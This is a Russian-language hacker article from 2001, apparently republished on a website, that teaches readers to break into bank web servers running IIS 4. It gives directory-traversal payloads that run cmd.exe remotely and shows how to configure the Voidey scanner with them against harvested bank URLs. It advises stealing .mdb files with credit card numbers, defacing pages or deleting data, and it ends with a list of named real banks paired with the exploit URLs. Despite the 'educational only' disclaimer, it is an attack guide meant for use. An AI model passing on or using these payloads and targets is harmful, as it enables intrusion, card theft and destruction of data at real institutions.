Данная статья не является пособием по взлому серверов. Написана она только для образовательных целей,
а также для тех нерадивых администраторов, которые не следят за безопасностью своих серверов.

Вы скажите это невозможно, взломать банк ???
Вы будете не правы. Что нужно для того, чтобы взломать банк, найти такой сервер банка, который 
поддается взлому 🙂 Логично не правда, ли... Ну, что крутые хакеры к взлому готовы ??? Я так и думал, тогда приступим.
Первым делом необходимо настроить свой сканер, я пользуюсь знаменитым
Voidey. Скачать можно либо с
сайта разработчика www.void.ru либо с сайта
www.madalf.al.ru
Так вот лезем в папку, где этот voidey расположен. Видим там несколько файлов, но нас интересуют
только два - это "servers.dat" и "exp.dat". Что же это за файлы ?
Servers.dat - это файл, где содержится список сканируемых серверов. Обычный текстовый формат. 
Exp.dat - этот файл содержит список уязвимостей, файл в обычном
текстовом формате. 

Немного отвлечемся. Первое, взламывать мы будем сервера под управлением IIS_4. Уязвимость будем 
использовать 
/scripts/msadc/..%c0%af../..%c0%af../ ..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
и совсем недавно обнаруженную 
/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\

Что дают нам эти две уязвимости, а дают они нам по 2 года строго режима при неумелом использовании.
Это я к безопасности тебя подвожу мой крутой хакер. Не забудь настроить прокси, а заодно и проверить его
на анонимность. Так вот, данные две уязвимости позволяют хакеру выполнять любые досовские команды на удаленном серваке.
Например, команда /scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\ покажет вам
директорию диска с. А команда /scripts/..%255c..%255cwinnt/system32/cmd.exe?
/c+copy+c:\index.htm+c:\inetpub\ скопирует файл index.htm, расположенный на диске с: в папку
c:\inetpub. Так вот открываем любым редактором файл "exp.dat" - видим там огромный список, вырезаем все кроме
первых двух. Записываем. Грузим Воидей. Давим пимпу "Список скриптов". Там видим две записи, вместо первой пишем
нашу первую уязвимость: /scripts/msadc/..%c0%af../..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ Вместо второй, нашу вторую:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 

Все - сканер почти готов. Осталось настроить список серверов, которые мы будем сканить.
www.yahoo.com - в строке поиска пишем, то что хотим найти, в нашем случае список банков. Так вот пишем,
например, "top bank sites". В итоге yahoo найдет нам кучу адресов, содержащих списки лучших онлайн банков.
В принципе, как вы будете доставать списки банков, это уже ваше дело. Можете пользоваться любым другим
законным способом. :)) Так вот нашли мы список адресов, этак 1000 штук. Кстати для непонятливых, как же с веб-страницы 
получить готовые списки - очень просто, меню "Вид" -> "В виде html". Открывается окно, где текстом
показана страница. Убираем все лишние тэги, оставляем только адреса серверов. Можно конечно
данный файл сохранить на диске и загнать в Word, а затем написать макрос, который уберет за вас все
лишнее кроме адресов сайтов. Но это уже совсем другая история.
Продолжим, записываем данный файл как servers.dat, копируем в папку Воидея.
Все сканер готов к использованию. Запускаем и идем пить кофе.
В среднем на один адрес при двух уязвимостях Воидей тратит по 5 - 10 секунд. Но за этой прогой надо следить.
На некоторых сайтах Воидей тормозит, приходится делать "Аборт", убирать из списка тормознутый сайт, а
заодно и то, что уже просканировано (вы же не хотите ждать еще час, чтобы просканировать, то что уже
просканировано). Как только Воидей закончит, смотри список просканированных адресов. Для ламеров - дави на пимпу
"Результаты". Сохрани на всякий случай, лучше сохранять на PGP-диск. 
В списке будет примерно следующее: 
www.xxxx.com/scripts/msadc/..%c0%af../..%c0%af.. /..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ -- (404) Not found
www.xxxx.com/scripts/msadc/..%c0%af../..%c0%af.. /..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ -- (200) Found
www.xxxx.com/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\ -- (404) Not found
www.xxxx.com/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\ -- (202) Found

И вот, мы нашли !!!!!!!!
www.yyyy.com/scripts/msadc/..%c0%af../..%c0%af.. /..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ -- (200) Found
www.yyyy.com/scripts/msadc/..%c0%af../..%c0%af.. /..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ -- (200) Found
www.yyyy.com/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\ -- (404) Not found
www.yyyy.com/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\ -- (200) Found

Ага, значит этот сайт yyyy.com содержит дыру в msadc, если вы еще не поняли 
/scripts/msadc/..%c0%af../..%c0%af../ ..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\. 
И не содержит дыру /scripts/..%255c ..%255cwinnt/system32/cmd.exe?/c+dir+c:\. 

Для особо непонятливых, объясняю смотреть надо на первую и третью строчку. А не на вторую и четвертую.
И что нам с этим делать. Это вы меня спрашиваете ? Я думаю вы знаете, что надо делать, а именно искать
файлы mdb, которые могут содержать очень интересную информацию, в частности, конечно же номера
кредитных карточек. Копировать их в папку inetpub/wwwroot. Затем через браузер скачать файл. (Примечание -
обычно файлы mdb находятся в той же папке, где и веб-страница. Говоря другим языком, в первую очередь
смотрите каталог c:\inetpub\wwwroot и c:\inetpub). Или дефейсить страницу. Или вообще поудалять все на хрен.
Но запомните товарищи я вам ничего не говорил !!! 

Статья написана NeoJo 26.05.01. 

P.S. А вот совсем небольшой список адресов, где данная уязвимость проскакивает.
(Примечание - это зарубежные банки !). 

www.amarbank.com/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.bankboston.com/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.cnb-waco.com/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.lonestarbank.com/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.ifor.com/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\
www.amarbank.com/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.bkb.com/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\
www.bankaudiusa.com/scripts/msadc/..%c0%af../..%c0%af../ ..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
www.bankwest.net/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.bbandt.com/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.camdennational.com/scripts/..%255 c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.coastlinefcu.org/scripts/..%255c..%255 cwinnt/system32/cmd.exe?/c+dir+c:\
www.cbtks.com/scripts/..%255c..%255cwinnt /system32/cmd.exe?/c+dir+c:\

Адреса все я не успел проверить, так что проверяйте сами. К чему я это говорю, а вот к чему
- сканер Воидей может и найти нужную уязвимость, но ведь она может быть пропатчена, не так ли......

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии